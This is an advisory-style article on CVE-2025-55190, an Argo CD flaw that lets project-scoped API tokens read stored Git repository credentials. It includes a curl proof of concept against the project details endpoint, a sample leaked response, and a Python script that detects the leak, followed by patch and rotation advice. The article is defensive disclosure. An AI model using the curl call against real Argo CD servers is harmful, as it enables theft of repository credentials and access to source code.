CVE-2025-55190 - Critical Argo CD Project API Token Vulnerability Exposes Repository Credentials
A security flaw, CVE-2025-55190, has been disclosed in multiple versions of Argo CD, the popular GitOps continuous delivery tool for Kubernetes. It lets anyone holding a project-level API token retrieve the credentials of Git repositories (usernames and passwords, plus other stored secret material) through Argo CD's project details API endpoint. Worryingly, the exposure happens even when the token's role grants only application management and read access to the project, and explicitly no access to repository secrets.
Let's break this down in plain terms, show the real risk with code examples, and explain how to protect your clusters.
What is Argo CD?
Argo CD is a tool that lets you manage Kubernetes applications by syncing your cluster state directly to code stored in Git repositories (GitOps). Argo CD supports multi-tenancy, and project-level roles let you define fine-grained access for different users or teams.
The Issue: Project Tokens Can Read Repo Credentials
If you hold an API token for any project, and its role grants nothing more than the projects, get action on that project (no repositories or secret access at all), you can still read the repository credentials Argo CD has stored for that project.
Why is this Bad?
Someone with only deployment or maintenance rights, who is not supposed to see secrets, can extract Git repository passwords, SSH private keys or personal access tokens. With those they can clone private source, push changes into the delivery pipeline, or pivot to whatever else the same credentials unlock.
If a token's role carries this permission (granted through Argo CD's RBAC policy, for example in argocd-rbac-cm)
p, role:user, projects, get, *, allow
or a project role that merely allows projects, get on a single project, the token can call the project details endpoint, GET /api/v1/projects/{project}/detailed. Before the fix the response contained not only the project definition but also every repository credential linked to the project, in plaintext.
Code Example: Stealing Secrets With a Regular Token
Suppose you have an API token (call it ARGO_API_TOKEN) for a project role in myproject that allows managing applications and reading the project, but has no repositories or secret permissions.
You can pull the stored credentials with a single curl call:
# Set ARGO_SERVER and ARGO_API_TOKEN in the environment and adjust myproject.
# -k skips TLS verification; drop it outside a lab.
curl -sk \
  -H "Authorization: Bearer $ARGO_API_TOKEN" \
  "https://$ARGO_SERVER/api/v1/projects/myproject/detailed"
Response snippet (vulnerable Argo CD versions; abridged, values illustrative):
{
  "project": {
    "metadata": {...},
    "spec": {
      "sourceRepos": ["https://gitlab.com/company/repo.git"],
      ...
    }
  },
  "globalProjects": [...],
  "repositories": [
    {
      "repo": "https://gitlab.com/company/repo.git",
      "project": "myproject",
      "username": "gituser",
      "password": "supersecretpassword"
    }
  ],
  "clusters": [...]
}
That is all it takes: the repository's username and password come back in the body of a call the token was allowed to make.
Why Does This Happen?
The project details endpoint returned the repository objects linked to the project exactly as stored, including their secret-bearing fields (password, SSH private key and the like), and its authorization check only required projects, get on the project. Nothing redacted those fields and no repositories permission was demanded, so any project-level token could read what only a repository administrator should see.
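As an added example (not Argo CD's own code and not part of the original advisory), the script below checks a project-details response for the leak described above. Run it with a project-scoped token before upgrading to confirm exposure, and again after upgrading to confirm the secret fields no longer come back; the repository list it produces also serves as the rotation inventory for the mitigation step. The secret field names follow Argo CD's Repository object; the server name, token, project name and the embedded sample response are constructed placeholders.

```python
"""Check an Argo CD project-details response for leaked repository credentials.

Added example for this article, not Argo CD code. Two parts:
  1. scan_for_leaked_credentials(): given the JSON body returned by
     GET /api/v1/projects/{project}/detailed, list every repository entry that
     still carries a secret-bearing field (password, sshPrivateKey, ...).
  2. fetch_detailed_project(): pull that body from a live server with a
     project-scoped token. Only used when ARGO_SERVER and ARGO_API_TOKEN are set;
     otherwise the constructed SAMPLE_RESPONSE below is scanned instead.
"""
import json
import os
import ssl
import urllib.request

# Secret-bearing fields of an Argo CD Repository object. A patched server should
# no longer return these to a caller that only holds projects, get.
SECRET_FIELDS = (
    "password",
    "sshPrivateKey",
    "tlsClientCertKey",
    "githubAppPrivateKey",
    "bearerToken",
)

# Constructed sample mimicking what a vulnerable server returns (all values invented).
SAMPLE_RESPONSE = {
    "project": {"metadata": {"name": "myproject"}, "spec": {"sourceRepos": ["*"]}},
    "globalProjects": [],
    "repositories": [
        {"repo": "https://gitlab.com/company/repo.git", "username": "gituser",
         "password": "supersecretpassword", "project": "myproject"},
        {"repo": "git@github.com:company/infra.git", "project": "myproject",
         "sshPrivateKey": "-----BEGIN OPENSSH PRIVATE KEY-----\n(invented)\n"},
        {"repo": "https://github.com/company/public.git", "project": "myproject"},
    ],
    "clusters": [],
}


def scan_for_leaked_credentials(detailed_response):
    """Return [(repo_url, [secret fields present]), ...] for repos with non-empty secrets.

    An empty list means the response is clean: either the server is patched
    or no credentials are stored for the project's repositories.
    """
    leaks = []
    for repo in detailed_response.get("repositories") or []:
        present = [f for f in SECRET_FIELDS if repo.get(f)]
        if present:
            leaks.append((repo.get("repo", "<unknown>"), present))
    return leaks


def rotation_inventory(detailed_response):
    """Sorted repo URLs whose stored credentials must be rotated if the token was exposed."""
    return sorted({url for url, _ in scan_for_leaked_credentials(detailed_response)})


def fetch_detailed_project(server, project, token, verify_tls=True):
    """GET /api/v1/projects/{project}/detailed with a bearer token and parse the JSON."""
    url = f"https://{server}/api/v1/projects/{project}/detailed"
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {token}"})
    ctx = ssl.create_default_context()
    if not verify_tls:  # equivalent of curl -k; lab use only
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return json.load(resp)


if __name__ == "__main__":
    server = os.environ.get("ARGO_SERVER")
    token = os.environ.get("ARGO_API_TOKEN")
    project = os.environ.get("ARGO_PROJECT", "myproject")  # hypothetical project name
    if server and token:
        body = fetch_detailed_project(server, project, token,
                                      verify_tls=os.environ.get("ARGO_INSECURE") != "1")
    else:
        print("ARGO_SERVER/ARGO_API_TOKEN not set; scanning the constructed sample instead")
        body = SAMPLE_RESPONSE
    leaks = scan_for_leaked_credentials(body)
    for repo_url, fields in leaks:
        print(f"LEAK  {repo_url}: {', '.join(fields)}")
    if leaks:
        print("VULNERABLE: rotate credentials for", rotation_inventory(body))
    else:
        print("clean: no secret-bearing fields returned for this project")
```

Run it with the same environment variables the curl example uses (plus ARGO_INSECURE=1 if you need the equivalent of -k). Against the sample it flags the two repositories that carry a password and an SSH key and ignores the one with no stored credentials; against a live server, any LEAK line means the token you used can read secrets it should not, and the listed repositories need new credentials.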
Fix & Mitigation
- Upgrade to a patched release: Argo CD 3.1.2 or later, or the backported fixes 3.0.14, 2.14.16 and 2.13.9 on the older release lines.
- Rotate any repository credentials, tokens or secrets that a project-level token could have reached; assume they have already leaked.
- Inventory who holds project-level tokens (argocd proj role list-tokens PROJECT ROLE) and review argocd-server request logs for calls to the project details endpoint from those tokens.
References & Original Advisories
- Official Argo CD Security Advisory
- NIST NVD – CVE-2025-55190
- Argo CD Issue Tracker (search with CVE-2025-55190 for discussion threads)
Conclusion
CVE-2025-55190 is a critical exposure that can undermine your entire Argo CD and GitOps security posture. Anyone with a low-privilege API token that can read a project can quietly collect every repository credential linked to that project.
Don't rely on RBAC alone to keep repository secrets private: upgrade as soon as possible.
If you have been running a vulnerable version, assume the credentials reachable through your projects have leaked and rotate them now.
Timeline
Published: 2025-09-04 23:15:32 UTC
Last modified: 2025-09-19 15:20:53 UTC